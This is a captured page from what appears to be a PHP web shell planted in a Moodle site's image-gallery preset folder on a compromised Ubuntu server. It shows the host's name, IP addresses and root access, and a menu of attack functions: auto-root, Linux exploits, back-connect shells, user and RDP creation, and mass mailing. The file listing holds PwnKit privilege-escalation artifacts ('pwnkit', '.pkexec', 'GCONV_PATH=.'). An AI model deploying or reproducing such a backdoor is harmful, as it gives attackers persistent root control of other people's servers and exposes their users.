Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
mod /
data /
preset /
imagegallery /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
addtemplate.html
275
B
-rwxrwxrwx
csstemplate.css
540
B
-rwxrwxrwx
jstemplate.js
1.2
KB
-rwxrwxrwx
listtemplate.html
262
B
-rwxrwxrwx
listtemplatefooter.html
12
B
-rwxrwxrwx
listtemplateheader.html
55
B
-rwxrwxrwx
preset.xml
718
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
rsstemplate.html
253
B
-rwxrwxrwx
rsstitletemplate.html
9
B
-rwxrwxrwx
singletemplate.html
332
B
-rwxrwxrwx
version.php
1.16
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jstemplate.js
var maxHeight = 550; var maxListHeight = 120; function init() { if (document.getElementById("singleimage")) single(); /*else if (document.getElementById("pictures")) list();*/ } function list() { imageDivs = document.getElementsByName("listimage"); for (i=0; i < imageDivs.length; i++) { currentHeight = imageDivs[i].offsetHeight; currentWidth = imageDivs[i].offsetWidth; if (currentHeight > maxListHeight) { ratio = maxListHeight / currentHeight; imageDivs[i].style.width = (currentWidth*ratio) + 'px'; imageDivs[i].style.height = (currentHeight*ratio) + 'px'; imageDivs[i].firstChild.style.height = '100%'; imageDivs[i].firstChild.style.width = '100%'; } } } function single() { var imageDiv = document.getElementById("singleimage"); if (imageDiv) { currentHeight = imageDiv.offsetHeight; currentWidth = imageDiv.offsetWidth; if (currentHeight > maxHeight) { ratio = maxHeight / currentHeight; imageDiv.style.width = (currentWidth*ratio) + 'px'; imageDiv.style.height = (currentHeight*ratio) + 'px'; } } } window.onload = init;
Close